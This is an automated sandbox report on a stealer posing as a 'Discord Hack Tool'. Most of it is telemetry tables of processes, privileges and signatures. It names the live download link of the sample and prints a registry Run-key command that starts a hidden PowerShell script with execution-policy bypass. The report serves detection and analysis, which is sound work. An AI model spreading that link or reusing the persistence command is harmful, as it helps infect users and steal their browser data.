Malware Analysis Report

2025-06-15 22:32

Sample ID 241102-maw59stlhk
Target https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
Tags
collection defense_evasion discovery execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU was found to be: Likely malicious.

Malicious Activity Summary

collection defense_evasion discovery execution persistence spyware stealer

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Clipboard Data

Hide Artifacts: Hidden Window

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates processes with tasklist

Subvert Trust Controls: Mark-of-the-Web Bypass

Browser Information Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies registry key

NTFS ADS

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-02 10:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-02 10:16

Reported

2024-11-02 10:17

Platform

win11-20241007-en

Max time kernel

58s

Max time network

66s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\curl.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Discord Hack Tool.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Discord Hack Tool.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\kNPBRiEUjxJrLAI.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\Discord Hack Tool.exe" C:\Windows\system32\reg.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache C:\Windows\system32\BackgroundTransferHost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 111331.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5728 wrote to memory of 2972 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2972 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 3128 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 4364 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5728 wrote to memory of 2056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
